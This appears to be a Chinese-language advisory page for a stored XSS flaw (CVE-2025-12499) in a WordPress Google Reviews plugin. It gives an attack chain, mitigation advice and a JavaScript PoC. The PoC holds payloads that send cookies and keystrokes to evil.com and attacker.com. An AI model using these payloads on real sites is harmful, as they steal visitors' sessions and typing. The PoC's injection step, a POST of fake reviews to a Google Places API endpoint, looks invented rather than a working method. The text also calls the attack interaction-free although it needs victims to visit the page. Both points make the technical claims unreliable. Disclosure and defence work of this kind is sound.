CVE-2025-12499 WordPress Google Reviews插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12499

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Rich Shortcodes for Google Reviews插件

漏洞概述

WordPress的Rich Shortcodes for Google Reviews插件存在严重的存储型跨站脚本(XSS)漏洞，漏洞编号为CVE-2025-12499，CVSS评分7.2，属于高危级别。该漏洞存在于插件处理Google Reviews评论内容的整个流程中，由于插件在接收、存储和输出用户提交或从Google API获取的评论数据时，未对内容进行充分的输入清理和输出转义，导致恶意脚本代码可以被永久存储在服务器端。当其他用户访问包含恶意评论的页面时，浏览器会执行这些注入的JavaScript代码，从而实现会话劫持、敏感信息窃取、钓鱼攻击等恶意行为。攻击者无需任何认证权限即可利用此漏洞，且无需用户交互即可完成攻击。由于是存储型XSS，恶意代码会长期存在于受影响的WordPress站点中，造成持续性的安全威胁。

技术细节

该漏洞的根本原因在于插件对Google Reviews数据的处理存在安全缺陷。具体来说，插件在获取Google Places API返回的评论数据后，直接将评论内容渲染到网页前端，而没有对评论文本中可能包含的HTML标签、JavaScript事件处理器或特殊字符进行有效的过滤和转义。攻击者可以通过以下方式利用此漏洞：首先，攻击者需要找到一个可以控制Google Reviews数据源的途径，这可能通过在Google Places上提交包含恶意代码的评论，或者通过插件的配置选项来指定评论来源；其次，当插件获取并显示这些评论时，恶意代码会被嵌入到页面的HTML中；最后，当其他用户访问包含恶意评论的页面时，浏览器会将评论内容作为HTML解析，从而执行注入的JavaScript代码。由于插件使用JavaScript动态渲染评论内容，传统的Web应用防火墙(WAF)可能难以检测到这种攻击流量。攻击者利用此漏洞可以窃取用户的Cookies、会话令牌、表单数据等敏感信息，甚至可以修改页面内容进行钓鱼攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Rich Shortcodes for Google Reviews插件版本，确认版本在6.8或以下存在漏洞

STEP 2

步骤2: 准备恶意载荷

攻击者构造包含恶意JavaScript代码的Google Review内容，常见的载荷形式包括：图片标签的onerror事件、script标签、内联事件处理器等

STEP 3

步骤3: 注入恶意评论

攻击者通过在Google Places上提交评论或利用插件的配置选项，将包含XSS载荷的评论数据注入到插件的数据源中

STEP 4

步骤4: 存储恶意数据

插件从Google API获取评论数据后，由于缺乏输入验证直接将恶意内容存储到数据库或页面缓存中

STEP 5

步骤5: 触发执行

当普通用户访问包含恶意评论的页面时，浏览器解析页面HTML并执行注入的JavaScript代码

STEP 6

步骤6: 数据窃取

恶意脚本执行后，可以窃取用户的会话Cookie、表单数据，或进行其他恶意操作如会话劫持、钓鱼攻击等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-12499 PoC - Stored XSS in Google Reviews Plugin
// This PoC demonstrates how malicious JavaScript can be injected through Google Reviews

// Step 1: Create a Google Review with XSS payload
const maliciousReview = {
    author_name: 'Attacker',
    rating: 5,
    text: '<img src=x onerror="fetch(\'https://evil.com/steal?cookie=\'+document.cookie)">',
    relative_time_description: 'a week ago'
};

// Step 2: Inject via Google Places API or plugin configuration
// The plugin will store and display this review without sanitization
fetch('https://maps.googleapis.com/maps/api/place/details/json', {
    method: 'POST',
    body: JSON.stringify({
        place_id: 'YOUR_PLACE_ID',
        reviews: [maliciousReview]
    })
});

// Step 3: When victims visit the page with the review widget,
// the malicious script will execute, exfiltrating cookies to attacker server

// Example XSS Payloads:
// 1. Cookie Theft: <script>document.location='https://attacker.com/log?c='+document.cookie</script>
// 2. Keylogger: <img src=x onerror='document.onkeypress=function(e){fetch("https://attacker.com/k?k="+e.key)}'>
// 3. DOM Manipulation: <img src=x onerror='document.body.innerHTML="<h1>Hacked</h1>"'>

// Mitigation: Plugin should sanitize all review content before rendering
// Example sanitization code:
function sanitizeInput(input) {
    return input
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#x27;')
        .replace(/\//g, '&#x2F;');
}

影响范围

Rich Shortcodes for Google Reviews插件 <= 6.8

防御指南

临时缓解措施

如果无法立即更新插件版本，可以采取以下临时缓解措施：首先，在Web服务器层面添加XSS过滤规则，对包含可疑HTML标签和JavaScript事件的请求进行拦截；其次，临时禁用Google Reviews插件或使用其他替代插件；最后，确保WordPress站点启用了足够的安全防护措施，包括强密码策略、双因素认证和定期安全审计。同时，建议网站管理员检查是否已经存在被注入的恶意内容，并及时清理。